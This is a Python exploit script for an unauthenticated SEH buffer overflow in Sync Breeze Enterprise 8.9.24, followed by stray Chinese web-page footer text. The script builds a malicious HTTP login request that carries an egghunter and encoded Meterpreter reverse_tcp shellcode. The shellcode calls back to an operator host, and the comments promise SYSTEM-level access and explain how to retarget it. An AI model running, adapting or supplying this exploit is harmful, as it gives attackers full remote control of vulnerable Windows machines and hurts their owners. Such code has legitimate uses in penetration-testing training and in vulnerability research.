#!/usr/bin/python
print "Sync Breeze Enterprise 8.9.24 Buffer Overflow Exploit"
print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
#Author website: www.tulpa-security.com
#Author twitter: @tulpa_security
#Exploit will land you NT AUTHORITY\SYSTEM
#You do not need to be authenticated, password below is garbage
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
#Tested on Windows 7 x86 Enterprise SP1
#Greetings to ozzie_offsec and carbonated
import socket
import sys
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('10.12.1.124',81))
#bad chars \x00\x0a\x0d\x26
#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=172.16.2.1 LPORT=1234 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
#payload size 308
buf = b""
buf += b"\xda\xc0\xb8\xa6\x6f\x32\xf2\xd9\x74\x24\xf4\x5b\x33"
buf += b"\xc9\xb1\x47\x31\x43\x1a\x03\x43\x1a\x83\xeb\xfc\xe2"
buf += b"\x53\x93\xda\x70\x9b\x6c\x1b\x15\x12\x89\x2a\x15\x40"
buf += b"\xd9\x1d\xa5\x03\x8f\x91\x4e\x41\x24\x21\x22\x4d\x4b"
buf += b"\x82\x89\xab\x62\x13\xa1\x8f\xe5\x97\xb8\xc3\xc5\xa6"
buf += b"\x72\x16\x07\xee\x6f\xda\x55\xa7\xe4\x48\x4a\xcc\xb1"
buf += b"\x50\xe1\x9e\x54\xd0\x16\x56\x56\xf1\x88\xec\x01\xd1"
buf += b"\x2b\x20\x3a\x58\x34\x25\x07\x13\xcf\x9d\xf3\xa2\x19"
buf += b"\xec\xfc\x08\x64\xc0\x0e\x51\xa0\xe7\xf0\x24\xd8\x1b"
buf += b"\x8c\x3e\x1f\x61\x4a\xcb\x84\xc1\x19\x6b\x61\xf3\xce"
buf += b"\xed\xe2\xff\xbb\x7a\xac\xe3\x3a\xaf\xc6\x18\xb6\x4e"
buf += b"\x09\xa9\x8c\x74\x8d\xf1\x57\x15\x94\x5f\x39\x2a\xc6"
buf += b"\x3f\xe6\x8e\x8c\xd2\xf3\xa3\xce\xba\x30\x89\xf0\x3a"
buf += b"\x5f\x9a\x83\x08\xc0\x30\x0c\x21\x89\x9e\xcb\x30\x9d"
buf += b"\x21\x03\xfa\xce\xdc\xa4\xfb\xc7\x1a\xf0\xab\x7f\x8b"
buf += b"\x79\x20\x80\x34\xac\xdd\x8a\xa2\xe3\x32\x89\x33\x94"
buf += b"\x30\x8d\x37\xb6\xbc\x6b\x67\x66\xef\x23\xc7\xd6\x4f"
buf += b"\x94\xaf\x3c\x40\xcb\xcf\x3e\x8a\x64\x65\xd1\x63\xdc"
buf += b"\x11\x48\x2e\x96\x80\x95\xe4\xd2\x82\x1e\x0b\x22\x4c"
buf += b"\xd7\x66\x30\x38\x17\x3d\x6a\xee\x28\xeb\x01\x0e\xbd"
buf += b"\x10\x80\x59\x29\x1b\xf5\xad\xf6\xe4\xd0\xa6\x3f\x71"
buf += b"\x9b\xd0\x3f\x95\x1b\x20\x16\xff\x1b\x48\xce\x5b\x48"
buf += b"\x6d\x11\x76\xfc\x3e\x84\x79\x55\x93\x0f\x12\x5b\xca"
buf += b"\x78\xbd\xa4\x39\x79\x81\x72\x07\x0f\xeb\x46"
#pop pop ret 10030991
nseh = "\x90\x90\xEB\x0B"
seh = "\x91\x09\x03\x10"
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
evil = "POST /login HTTP/1.1\r\n"
evil += "Host: 10.12.1.124\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
evil += "&password=aaaaa\r\n"
evil += "\x41" * 12290 #subtract/add for payload
evil += "w00tw00t"
evil += "\x90" * 20
evil += buf
evil += "\x90" * 50
evil += "\x42" * 1614
evil += nseh
evil += seh
evil += "\x90" * 20
evil += egghunter
evil += "\x90" * 7000
print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
